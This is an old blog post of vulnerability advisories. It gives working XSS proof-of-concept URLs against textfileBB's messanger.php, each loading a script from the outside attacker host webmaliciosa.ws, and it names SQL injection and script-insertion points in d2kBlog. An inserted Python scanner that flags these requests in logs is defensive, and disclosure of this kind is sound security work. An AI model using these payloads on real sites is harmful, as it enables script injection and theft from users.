ecoestadistica.com

Wednesday, March 08, 2006

Vulnerabilities...

textfileBB <= 1.0 Multiple XSS

software: textfileBB
vendor website: http://tfbb.jcink.com/

Proof of Concept:

http://example.com/messanger.php?mess=%3Cscript%20src=http://webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://webmaliciosa.ws/xss.js%3E%3C/body%3E%3C/html%3E

Credit: retard
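
A defensive check for the requests listed above, as an added example that is not part of the original post: it scans web access log lines for requests to messanger.php whose mess or user parameter decodes to HTML markup. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

WATCHED_PARAMS = ("mess", "user")  # parameters used by the proof-of-concept URLs
MARKUP = re.compile(r'[<>"]')      # characters those URLs rely on once decoded
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # assumed log format

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Mar/2006:10:00:01 +0000] "GET /forum/messanger.php?p=MSN&user=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Mar/2006:10:00:07 +0000] "GET /forum/messanger.php?p=MSN&user=%3Cscript%20src=http://attacker.invalid/x.js%3E%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [08/Mar/2006:10:00:09 +0000] "GET /forum/messanger.php?mess=%253Cscript%253E HTTP/1.1" 200 300',
    '203.0.113.7 - - [08/Mar/2006:10:00:12 +0000] "GET /forum/index.php?user=%3Cb%3E HTTP/1.1" 200 100',
]


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for messanger.php requests carrying markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/messanger.php"):
        return []
    hits = []
    # parse_qs performs the first round of percent-decoding itself.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = decode_fully(value)
            if MARKUP.search(decoded):
                hits.append((name, decoded))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, value in suspicious_params(line):
            print(f"markup in '{param}': {value!r}")
```

A hit means the request carried markup in a watched parameter, not that the page reflected it; confirm against the response or the application's output encoding.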
--------------------------------------------------------------------------------------

d2kBlog Multiple Vulnerabilities

Product : d2kBlog <= 1.0.3
Vendor: http://www.d2ksoft.com/

Proof of Concept:

SQL_Injection :
Cookie : memName=[SQL_Injection]

Script Insertion :
Default.asp , POST : name=KAPDA&email=KAPDA&msg=&submit=Send+Message
